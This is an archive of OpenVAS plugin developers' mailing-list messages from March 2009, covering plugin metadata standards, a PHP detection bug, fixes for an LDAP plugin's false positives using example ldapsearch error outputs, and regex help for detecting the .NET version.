KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJJuW0YAAoJENETScWxZUSYJJAH/Rv+fFLZbFj1JsEfk8L8QX6r zqyVFpvylk0FRO8S5Lz9ua6qYU47CBv1QcGmR0FPIe4LtOlTf1y2vkYI3xuNkAxr i/EPJzdjHLtHc50Kjdik6cae15snhjraBSpCLkusq2FMW52rzF+KMJ8/wvtgyluS kgJe3Hw9i5ojmzvr+xjiIueRiLJJFmYy+o3fCPR/U/c9cNMa2awdiNJDiDGn08BU wsCzm5zuQeaCLUKxOU6ST9qxlTTzH2N/1mhJfnxsK7L038IpurHnvjxpfM9Iwzr7 iUXGzDtw5w07/SSiwnqADSKSDhlnfLgrbkgyLugtJU1eb1JqGrNPGwleJ5tCzZc= =ZmWJ -----END PGP SIGNATURE----- From felix.wolfsteller at intevation.de Fri Mar 13 09:17:25 2009 From: felix.wolfsteller at intevation.de (Felix Wolfsteller) Date: Fri, 13 Mar 2009 09:17:25 +0100 Subject: [Openvas-plugins] Standardization of plugin formats In-Reply-To: <49B921BC.3010707@gmail.com> References: <49B921BC.3010707@gmail.com> Message-ID: <200903130917.26037.felix.wolfsteller@intevation.de> On Thursday 12 March 2009 15:52:44 Shawn Duffy wrote: > Are there any plans to enforce some sort of standard format for plugin > information in plugins? I'm currently writing an app that parses the > plugins for information and stores it in a database. The app, once it > reaches a reasonable level of maturity, will be open source and > available to anyone. I find its a very good idea. When do you think that this maturity level would be reached? And which information do you want to include in the db? > However, in trying to extract information from plugin files, I'm finding > a huge variety of formats for plugin information. For example, plugin > name. There are multiple ways the name may appear in a particular plugin: > Is it possible to parse this using a fairly simple RegEx? Sure. But > since everyone appears to be free to add their info anyway they like, as > long as it is syntactically correct in NASL, you're forced to > continually check new plugins to see if some other contributed script > has come up with an entirely new way to enter the info. I was toying around with libraries to build a dependency and include graph for NVTs. Another idea was to visually represent knowledge base items and insert set_kb and get_kb edges, so that it would be possible to see which plugins access which knowledge base items. Fairly simple regexps worked okay for that task (I got a good number of true results), however you get a resolution problem when variables are involved. I am not sure if that is allowed in nasl, but I guess it should be: english_name = "NastyNameScript"; name["english"] = english_name; And one can imagine much worse scenarios, where strings are concatenated etc. For that reason I would advise to do what Thomas suggested: Either use * a "fake"- client or * the clients plugin-cache (easy to parse). Another solution would be to use the nasl standalone interpreter (openvas-libnasl/nasl/nasl.c) or some parts of the server component. It is my favorite solution, because of four reasons * I was interested in more "deep" information that is not included in the caches - like includes, maybe which message types are sent etc. * One has to touch and clean up the NVT representation in code :) . * You would not have to worry about upcoming changes to the NASL syntax. * Probably it would be slightly easier to extract the descriptions etc for languages other than english. enjoy felix > So, are there any plans to come up with a basic "style guide" for > plugins? And reject any that aren't in the specific format? It would > be nice to know that script_name, for example, will _always_ be: > > name["english"] = > name["francais"] = > > and so on. I think in the long run this will make OpenVAS that much > more extensible and scalable. I'd even volunteer to help come up with > the guidelines if necessary. Thoughts and criticisms welcome... > > Thanks, > Shawn > > _______________________________________________ > Openvas-plugins mailing list > Openvas-plugins at wald.intevation.org > http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins -- Felix Wolfsteller | ++49-541-335 08 3451 | http://www.intevation.de/ PGP Key: 39DE0100 Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner From kost at linux.hr Fri Mar 13 09:49:56 2009 From: kost at linux.hr (Vlatko Kosturjak) Date: Fri, 13 Mar 2009 09:49:56 +0100 Subject: [Openvas-plugins] bug in php detection scripts In-Reply-To: <3FE1A4912A75412D8347EAD7D1A88FA8@bchandra> References: <49B8DA89.7000709@linux.hr> <3FE1A4912A75412D8347EAD7D1A88FA8@bchandra> Message-ID: <49BA1E34.4020301@linux.hr> Chandrashekhar B wrote: > Hello Kost, > > Thanks for reporting. There's actually another KB item called "PHP/Port" set > along with "PHP/Version" which is being used in some scripts and some aren't > using it. We are addressing this now. Great. Thanks. What about using the correct hierarchy in KB? > It would be good (and correct) to put PHP under following hieararchy: > www//phpversion=x.x.x Kost From kost at linux.hr Fri Mar 13 10:16:57 2009 From: kost at linux.hr (Vlatko Kosturjak) Date: Fri, 13 Mar 2009 10:16:57 +0100 Subject: [Openvas-plugins] bug in php detection scripts In-Reply-To: <49BA1E34.4020301@linux.hr> References: <49B8DA89.7000709@linux.hr> <3FE1A4912A75412D8347EAD7D1A88FA8@bchandra> <49BA1E34.4020301@linux.hr> Message-ID: <49BA2489.7090404@linux.hr> Vlatko Kosturjak wrote: > Chandrashekhar B wrote: >> Thanks for reporting. There's actually another KB item called "PHP/Port" set >> along with "PHP/Version" which is being used in some scripts and some aren't >> using it. We are addressing this now. > Great. Thanks. What about using the correct hierarchy in KB? >> It would be good (and correct) to put PHP under following hieararchy: >> www//phpversion=x.x.x While we speak about this. Also, would be good to have general talk about having "Check Type:" item in every plugin output. So, for example, this check would have following in its output: Check type: Remote version check. Another types (e.g.): Local version check Remote vulnerability trigger etc. It would greatly help the tester in determining false positives. Kost From jan-oliver.wagner at intevation.de Fri Mar 13 12:09:52 2009 From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner) Date: Fri, 13 Mar 2009 12:09:52 +0100 Subject: [Openvas-plugins] OpenVAS plugin for ldap In-Reply-To: <20090310135733.14043rl8gdsogb40@www.kattare.com> References: <20090310135733.14043rl8gdsogb40@www.kattare.com> Message-ID: <200903131209.54930.jan-oliver.wagner@intevation.de> Hello Bernd, On Dienstag, 10. M?rz 2009, bneumann at kattare.com wrote: > Hi Tarik, unfortunately Tarik is not active for OpenVAS since quite a while. > Since your plugin was added to OpenVAS, all the hosts in our network (more > than 700) suddenly show up a security hole for ldap. It should have been part of OpenVAS for a very long time. Actually it should not have happened suddenly. Or did you just executed the first scan with OpenVAS? > here is the output from an html page: >... > I assume "Can't con" means "Cannot connect." The broken string comes from ldapsearch I guess. > If the plugin cannot connect > than there should not be any vulnerability present. Even hosts that are > firewalled and do not allow acces to port 389/tcp and hosts that have port > 389/tcp closed (because an ldap server is not running) show up as having this > ldap vulnerability. > > What am I doing wrong? How can I avoid all these false positives? I would > very much appreciate your help in this matter. We will look into this. Best Jan -- Dr. Jan-Oliver Wagner | ++49-541-335083-0 | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner From bchandra at secpod.com Fri Mar 13 12:53:39 2009 From: bchandra at secpod.com (Chandrashekhar B) Date: Fri, 13 Mar 2009 17:23:39 +0530 Subject: [Openvas-plugins] OpenVAS plugin for ldap In-Reply-To: <200903131209.54930.jan-oliver.wagner@intevation.de> References: <20090310135733.14043rl8gdsogb40@www.kattare.com> <200903131209.54930.jan-oliver.wagner@intevation.de> Message-ID: <516BDF2EAB6A40D69F764D4487838ED1@bchandra> I have seen the plugin, it is not doing error checking before calling to report. Even if the pread or ldapsearch fails, it reports. We don't have LDAP setup right now, if you can give me the error response string for a failed ldapsearch, we could update the plugin. Thanks, Chandra. -----Original Message----- From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Jan-Oliver Wagner Sent: Friday, March 13, 2009 4:40 PM To: openvas-plugins at wald.intevation.org Subject: Re: [Openvas-plugins] OpenVAS plugin for ldap Hello Bernd, On Dienstag, 10. M?rz 2009, bneumann at kattare.com wrote: > Hi Tarik, unfortunately Tarik is not active for OpenVAS since quite a while. > Since your plugin was added to OpenVAS, all the hosts in our network (more > than 700) suddenly show up a security hole for ldap. It should have been part of OpenVAS for a very long time. Actually it should not have happened suddenly. Or did you just executed the first scan with OpenVAS? > here is the output from an html page: >... > I assume "Can't con" means "Cannot connect." The broken string comes from ldapsearch I guess. > If the plugin cannot connect > than there should not be any vulnerability present. Even hosts that are > firewalled and do not allow acces to port 389/tcp and hosts that have port > 389/tcp closed (because an ldap server is not running) show up as having this > ldap vulnerability. > > What am I doing wrong? How can I avoid all these false positives? I would > very much appreciate your help in this matter. We will look into this. Best Jan -- Dr. Jan-Oliver Wagner | ++49-541-335083-0 | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner _______________________________________________ Openvas-plugins mailing list Openvas-plugins at wald.intevation.org http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins From shawnduffy at gmail.com Fri Mar 13 13:52:26 2009 From: shawnduffy at gmail.com (Shawn Duffy) Date: Fri, 13 Mar 2009 08:52:26 -0400 Subject: [Openvas-plugins] Standardization of plugin formats In-Reply-To: <200903130917.26037.felix.wolfsteller@intevation.de> References: <49B921BC.3010707@gmail.com> <200903130917.26037.felix.wolfsteller@intevation.de> Message-ID: <49BA570A.1050800@gmail.com> Felix Wolfsteller wrote: > I find its a very good idea. When do you think that this maturity level would > be reached? And which information do you want to include in the db? > I'm hoping I'll have a beta release within a few months. As for what's included in the DB, it's not yet certain. But right now, I wanted to be able to grab and store ID, name, summary, and family/category. This would be helpful in being able to generate .openvasrc files and making them human-readable. Based on someone else's suggestion, I'm just wrote a rudimentary client in PHP so I could just extract the information directly from the OpenVAS server. This information is more reliable and more easily parseable. So I may end up just querying the server and storing that information in the db. We'll see. I'm still stumbling through the OPT docs and learning how the protocol works. More updates as they're available. Thanks! Shawn From meyer at strato-rz.de Fri Mar 13 15:14:09 2009 From: meyer at strato-rz.de (Michael Meyer) Date: Fri, 13 Mar 2009 15:14:09 +0100 Subject: [Openvas-plugins] OpenVAS plugin for ldap In-Reply-To: <516BDF2EAB6A40D69F764D4487838ED1@bchandra> References: <20090310135733.14043rl8gdsogb40@www.kattare.com> <200903131209.54930.jan-oliver.wagner@intevation.de> <516BDF2EAB6A40D69F764D4487838ED1@bchandra> Message-ID: <20090313141409.GA16276@strato-rz.de> *** Chandrashekhar B wrote: > I have seen the plugin, it is not doing error checking before calling to > report. Even if the pread or ldapsearch fails, it reports. We don't have > LDAP setup right now, if you can give me the error response string for a > failed ldapsearch, we could update the plugin. http://leto.net/docs/ldap_error_code.php mime at schlepp:~>ldapsearch -x -D "cn=foo,o=bla" -h $LDAP_HOST_EXIST ldap_bind: Server is unwilling to perform (53) additional info: unauthenticated bind (DN with no password) disallowed mime at schlepp:~> ldapsearch -x -h $LDAP_HOST_NOT_EXIST ldap_bind: Can't contact LDAP server (-1) mime at schlepp:~> ldapsearch -x -D "cn=admin,o=bla" -w wrong_pass -h $LDAP_HOST_EXIST ldap_bind: Invalid credentials (49) mime at schlepp:~> ldapsearch -x -h $LDAP_HOST_EXIST # extended LDIF # # LDAPv3 # base <> with scope subtree # filter: (objectclass=*) # requesting: ALL # # search result search: 2 result: 32 No such object # numResponses: 1 HTH Micha From jan-oliver.wagner at intevation.de Fri Mar 13 16:57:12 2009 From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner) Date: Fri, 13 Mar 2009 16:57:12 +0100 Subject: [Openvas-plugins] OpenVAS plugin for ldap In-Reply-To: <20090313141409.GA16276@strato-rz.de> References: <20090310135733.14043rl8gdsogb40@www.kattare.com> <516BDF2EAB6A40D69F764D4487838ED1@bchandra> <20090313141409.GA16276@strato-rz.de> Message-ID: <200903131657.14987.jan-oliver.wagner@intevation.de> Hello, I've updated the NASL script to be more verbose. Especially it tells about the ldapsearch command, so you can easily copy & paste it and try it on command shell. The script is not deocumented in the way that it explains why it is an Security Hole. The text says, it shows the information that can be pulled from the ldap, but in fact it is truncated and only the first couple of bytes are shown in the report. Any LDAP experts around? ;-) Best Jan On Freitag, 13. M?rz 2009, Michael Meyer wrote: > *** Chandrashekhar B wrote: > > I have seen the plugin, it is not doing error checking before calling to > > report. Even if the pread or ldapsearch fails, it reports. We don't have > > LDAP setup right now, if you can give me the error response string for a > > failed ldapsearch, we could update the plugin. > > http://leto.net/docs/ldap_error_code.php > > mime at schlepp:~>ldapsearch -x -D "cn=foo,o=bla" -h $LDAP_HOST_EXIST > ldap_bind: Server is unwilling to perform (53) > additional info: unauthenticated bind (DN with no password) disallowed > > mime at schlepp:~> ldapsearch -x -h $LDAP_HOST_NOT_EXIST > ldap_bind: Can't contact LDAP server (-1) > > mime at schlepp:~> ldapsearch -x -D "cn=admin,o=bla" -w wrong_pass -h $LDAP_HOST_EXIST > ldap_bind: Invalid credentials (49) > > mime at schlepp:~> ldapsearch -x -h $LDAP_HOST_EXIST > # extended LDIF > # > # LDAPv3 > # base <> with scope subtree > # filter: (objectclass=*) > # requesting: ALL > # > > # search result > search: 2 > result: 32 No such object > > # numResponses: 1 -- Dr. Jan-Oliver Wagner | ++49-541-335083-0 | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner From meyer at strato-rz.de Fri Mar 13 21:35:47 2009 From: meyer at strato-rz.de (Michael Meyer) Date: Fri, 13 Mar 2009 21:35:47 +0100 Subject: [Openvas-plugins] OpenVAS plugin for ldap In-Reply-To: <200903131657.14987.jan-oliver.wagner@intevation.de> References: <20090310135733.14043rl8gdsogb40@www.kattare.com> <516BDF2EAB6A40D69F764D4487838ED1@bchandra> <20090313141409.GA16276@strato-rz.de> <200903131657.14987.jan-oliver.wagner@intevation.de> Message-ID: <20090313203547.GA9669@strato-rz.de> *** Jan-Oliver Wagner wrote: > The script is not deocumented in the way that it > explains why it is an Security Hole. > The text says, it shows the information that can be pulled from the ldap, > but in fact it is truncated and only the first couple of bytes are shown in the > report. > > Any LDAP experts around? ;-) http://markmail.org/message/ry5kkd6mrpzgzj42 http://www.openldap.org/lists/openldap-software/200605/msg00191.html http://kuerzer.de/hf3OS3QpP http://kuerzer.de/gR18v5O9j http://www.mail-archive.com/nessus at list.nessus.org/msg17819.html Micha From jan-oliver.wagner at intevation.de Mon Mar 16 15:37:31 2009 From: jan-oliver.wagner at intevation.de (Jan-Oliver Wagner) Date: Mon, 16 Mar 2009 15:37:31 +0100 Subject: [Openvas-plugins] OpenVAS plugin for ldap In-Reply-To: <20090313203547.GA9669@strato-rz.de> References: <20090310135733.14043rl8gdsogb40@www.kattare.com> <200903131657.14987.jan-oliver.wagner@intevation.de> <20090313203547.GA9669@strato-rz.de> Message-ID: <200903161537.34233.jan-oliver.wagner@intevation.de> On Freitag, 13. M?rz 2009, Michael Meyer wrote: > *** Jan-Oliver Wagner wrote: > > The script is not deocumented in the way that it > > explains why it is an Security Hole. > > The text says, it shows the information that can be pulled from the ldap, > > but in fact it is truncated and only the first couple of bytes are shown in the > > report. > > > > Any LDAP experts around? ;-) > > http://markmail.org/message/ry5kkd6mrpzgzj42 > http://www.openldap.org/lists/openldap-software/200605/msg00191.html > http://kuerzer.de/hf3OS3QpP > http://kuerzer.de/gR18v5O9j > http://www.mail-archive.com/nessus at list.nessus.org/msg17819.html seems we should downgrade the severity of this finding ? Best Jan -- Dr. Jan-Oliver Wagner | ++49-541-335083-0 | http://www.intevation.de/ Intevation GmbH, Neuer Graben 17, 49074 Osnabr?ck | AG Osnabr?ck, HR B 18998 Gesch?ftsf?hrer: Frank Koormann, Bernhard Reiter, Dr. Jan-Oliver Wagner From meyer at strato-rz.de Mon Mar 16 16:21:05 2009 From: meyer at strato-rz.de (Michael Meyer) Date: Mon, 16 Mar 2009 16:21:05 +0100 Subject: [Openvas-plugins] OpenVAS plugin for ldap In-Reply-To: <200903161537.34233.jan-oliver.wagner@intevation.de> References: <20090310135733.14043rl8gdsogb40@www.kattare.com> <200903131657.14987.jan-oliver.wagner@intevation.de> <20090313203547.GA9669@strato-rz.de> <200903161537.34233.jan-oliver.wagner@intevation.de> Message-ID: <20090316152105.GA32494@strato-rz.de> *** Jan-Oliver Wagner wrote: > On Freitag, 13. M?rz 2009, Michael Meyer wrote: > > *** Jan-Oliver Wagner wrote: > > > The script is not deocumented in the way that it > > > explains why it is an Security Hole. > > > The text says, it shows the information that can be pulled from the ldap, > > > but in fact it is truncated and only the first couple of bytes are shown in the > > > report. > > > > > > Any LDAP experts around? ;-) > > > > http://markmail.org/message/ry5kkd6mrpzgzj42 > > http://www.openldap.org/lists/openldap-software/200605/msg00191.html > > http://kuerzer.de/hf3OS3QpP > > http://kuerzer.de/gR18v5O9j > > http://www.mail-archive.com/nessus at list.nessus.org/msg17819.html > > seems we should downgrade the severity of this finding ? IMHO, yes. Moreover, this plugin should be revised that it produces fewer false positives. Currently, the plugin only determine if there is *any* output from ldapsearch. If so, the plugin reports a security problem. Also if there came messages like "Could not Connect". Micha From christian.edjenguele at owasp.org Tue Mar 17 22:34:32 2009 From: christian.edjenguele at owasp.org (Christian Eric Edjenguele) Date: Tue, 17 Mar 2009 22:34:32 +0100 Subject: [Openvas-plugins] REGEX expert Message-ID: <49C01768.6080904@owasp.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I've the following script, it works but the regex does not handle correctly the string I need (Version Information: Microsoft .NET Framework Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433) contents .net and asp version information, I can I extract it ? chrix at darkstar:~/Workspaces/OpenVAS/trunk/openvas-plugins/scripts$ sudo openvas-nasl -X remote-detect-MSdotNET-version2.nasl -t 216.134.222.61 [7016] plug_set_key:internal_send(0)['3 Services/www/80/working=1; ']: Socket operation on non-socket [7016] plug_set_key:internal_send(0)['1 www/80/keepalive=yes; ']: Socket operation on non-socket [7016] plug_set_key:internal_send(0)['3 dotNET/installed=1; ']: Socket operation on non-socket [7016] plug_set_key:internal_send(0)['3 aspNET/installed=1; ']: Socket operation on non-socket [7016] plug_set_key:internal_send(0)['3 dotNET/port=80; ']: Socket operation on non-socket Version Information: Microsoft .NET Framework Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433 [7016] plug_set_key:internal_send(0)['1 SentData/(null)/INFO= Version Information: Microsoft .NET Framework Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433\r\n; ']: Socket operation on non-socket [7016] plug_set_key:internal_send(0)['3 Success/(null)=1; ']: Socket operation on non-socket - -- Christian Eric Edjenguele IT Security Software Engineer / IT Enterprise Software Architect Mobile (IT): +39 3408580513 PGP KeyID: 0xB1654498 Key Server: http://pgp.mit.edu - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v1.4.9 (GNU/Linux) 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 E1MQObpE5A== =7VGF - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBAgAGBQJJwBdaAAoJENETScWxZUSYyEcH/iV9lYjUvMbEDQGf1lPD6XOu SvKQzea69y7CkckApoAQJOd9oaoEVhCk1bIa6EFqqsoXa+HJlqw0LRJJI1TpZvfv SeQfmgkP/QT4osE3VqgiNgtIgDME5hn4Zz6bNzNDGizsyqaF+Z07RMgl0bGjqQrm D1XY4yOGTOq1aiDdOA9FnW99sQs9o9aO4Bwn+L9HWU+a5Pnlc8YS8MUabSyGo7BO wvTt0JSIhyr9O/LYUJaIA+SU019wKftKNpmIaqW+qKx5gCjetW3X99FYaHYLAua6 rj8F0SSdWROyh9qdyQSFKsaWZst4sx5C/RgwoEzHOov4ZXVW+Ms46teRLZzMwVI= =PzDb -----END PGP SIGNATURE----- From schandan at secpod.com Wed Mar 18 07:18:53 2009 From: schandan at secpod.com (chandan) Date: Wed, 18 Mar 2009 11:48:53 +0530 Subject: [Openvas-plugins] REGEX expert In-Reply-To: <3A353E49E651447DB382DF46C073E5B4@bchandra> References: <3A353E49E651447DB382DF46C073E5B4@bchandra> Message-ID: <49C0924D.9060506@secpod.com> I found 'response' variable has NULL compare. I think it should be 'reply' And for regex, use below method (easy to get value by using eregmatch). dotNet_header = eregmatch(pattern:"Microsoft .NET Framework Version:([0-9.]+)", string:reply, icase:TRUE); aspNet_header = egrep(pattern:"ASP.NET Version:([0-9.]+)", string:reply, icase:TRUE); This will get in the form of list. Find the output below for the regex. dotNet_header [ 0: 'Microsoft .NET Framework Version:2.0.50727.1433', 1: '2.0.50727.1433' ] aspNet_header [ 0: 'ASP.NET Version:2.0.50727.1433', 1: '2.0.50727.1433' ] By using this you can set the version by pointing to index 1 dotNet_header[1] and aspNet_header[1] Chandan Chandrashekhar B wrote: > -----Original Message----- > From: openvas-plugins-bounces at wald.intevation.org > [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Christian > Eric Edjenguele > Sent: Wednesday, March 18, 2009 3:05 AM > To: openvas-plugins at wald.intevation.org > Subject: [Openvas-plugins] REGEX expert > > I've the following script, it works but the regex does not handle > correctly the string I need (Version Information: Microsoft > .NET Framework Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433) > contents .net and asp version information, I can I extract it ? > > chrix at darkstar:~/Workspaces/OpenVAS/trunk/openvas-plugins/scripts$ sudo > openvas-nasl -X remote-detect-MSdotNET-version2.nasl -t 216.134.222.61 > [7016] plug_set_key:internal_send(0)['3 Services/www/80/working=1; > ']: Socket operation on non-socket > [7016] plug_set_key:internal_send(0)['1 www/80/keepalive=yes; > ']: Socket operation on non-socket > [7016] plug_set_key:internal_send(0)['3 dotNET/installed=1; > ']: Socket operation on non-socket > [7016] plug_set_key:internal_send(0)['3 aspNET/installed=1; > ']: Socket operation on non-socket > [7016] plug_set_key:internal_send(0)['3 dotNET/port=80; > ']: Socket operation on non-socket > Version Information: Microsoft .NET Framework > Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433 > > [7016] plug_set_key:internal_send(0)['1 SentData/(null)/INFO= > Version Information: Microsoft .NET Framework > Version:2.0.50727.1433; ASP.NET Version:2.0.50727.1433\r\n; > ']: Socket operation on non-socket > [7016] plug_set_key:internal_send(0)['3 Success/(null)=1; > ']: Socket operation on non-socket > _______________________________________________ Openvas-plugins mailing list Openvas-plugins at wald.intevation.org http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins From bchandra at secpod.com Fri Mar 20 08:01:24 2009 From: bchandra at secpod.com (Chandrashekhar B) Date: Fri, 20 Mar 2009 12:31:24 +0530 Subject: [Openvas-plugins] OpenVAS plugin for ldap In-Reply-To: <20090316152105.GA32494@strato-rz.de> References: <20090310135733.14043rl8gdsogb40@www.kattare.com><200903131657.14987.jan-oliver.wagner@intevation.de><20090313203547.GA9669@strato-rz.de><200903161537.34233.jan-oliver.wagner@intevation.de> <20090316152105.GA32494@strato-rz.de> Message-ID: We have updated ldapsearch.nasl to fix the false reporting and also downgraded the severity. General response might change according to the ldap server used, any testing feedback is appreciated. Thanks, Chandra. -----Original Message----- From: openvas-plugins-bounces at wald.intevation.org [mailto:openvas-plugins-bounces at wald.intevation.org] On Behalf Of Michael Meyer Sent: Monday, March 16, 2009 8:51 PM To: openvas-plugins at wald.intevation.org Subject: Re: [Openvas-plugins] OpenVAS plugin for ldap *** Jan-Oliver Wagner wrote: > On Freitag, 13. M?rz 2009, Michael Meyer wrote: > > *** Jan-Oliver Wagner wrote: > > > The script is not deocumented in the way that it > > > explains why it is an Security Hole. > > > The text says, it shows the information that can be pulled from the ldap, > > > but in fact it is truncated and only the first couple of bytes are shown in the > > > report. > > > > > > Any LDAP experts around? ;-) > > > > http://markmail.org/message/ry5kkd6mrpzgzj42 > > http://www.openldap.org/lists/openldap-software/200605/msg00191.html > > http://kuerzer.de/hf3OS3QpP > > http://kuerzer.de/gR18v5O9j > > http://www.mail-archive.com/nessus at list.nessus.org/msg17819.html > > seems we should downgrade the severity of this finding ? IMHO, yes. Moreover, this plugin should be revised that it produces fewer false positives. Currently, the plugin only determine if there is *any* output from ldapsearch. If so, the plugin reports a security problem. Also if there came messages like "Could not Connect". Micha _______________________________________________ Openvas-plugins mailing list Openvas-plugins at wald.intevation.org http://lists.wald.intevation.org/mailman/listinfo/openvas-plugins From goran.licina at lss.hr Mon Mar 30 11:13:19 2009 From: goran.licina at lss.hr (=?iso-8859-2?Q?Goran_Li=E8ina?=) Date: Mon, 30 Mar 2009 11:13:19 +0200 Subject: [Openvas-plugins] New plugin development team Message-ID: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr> Hi, in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we gathered a team for developing new OpenVAS plugins. Since we would like to start with writing plugins as soon as possible, Mr. Wagner suggested that we could for a start develop missing plugins that cause other OpenVAS plugins not to work properly. So, can You please tell us on which plugin(s) we can start working on and what is the common procedure to do that? Best regards, Goran Licina -- Laboratory for Systems and Signals Department of Electronic Systems and Information Processing Faculty of Electrical Engineering and Computing University of Zagreb -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.wald.intevation.org/pipermail/openvas-plugins/attachments/20090330/885bff87/attachment.html From michael.wiegand at intevation.de Mon Mar 30 14:39:37 2009 From: michael.wiegand at intevation.de (Michael Wiegand) Date: Mon, 30 Mar 2009 14:39:37 +0200 Subject: [Openvas-plugins] New plugin development team In-Reply-To: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr> References: <8A02A3DF683DEE42BE73187F4CA4444C04CA58@vlasta.lss-net.lss.hr> Message-ID: <20090330123937.GF25646@intevation.de> * Goran Li?ina [30. Mar 2009]: > in agreement with Mr. Jan-Oliver Wagner and Mr. Vlatko Kosturjak we > gathered a team for developing new OpenVAS plugins. Since we would > like to start with writing plugins as soon as possible, Mr. Wagner > suggested that we could for a start develop missing plugins that cause > other OpenVAS plugins not to work properly. That sounds very good, welcome to the OpenVAS project! :) > So, can You please tell us on which plugin(s) we can start working on > and what is the common procedure to do that? 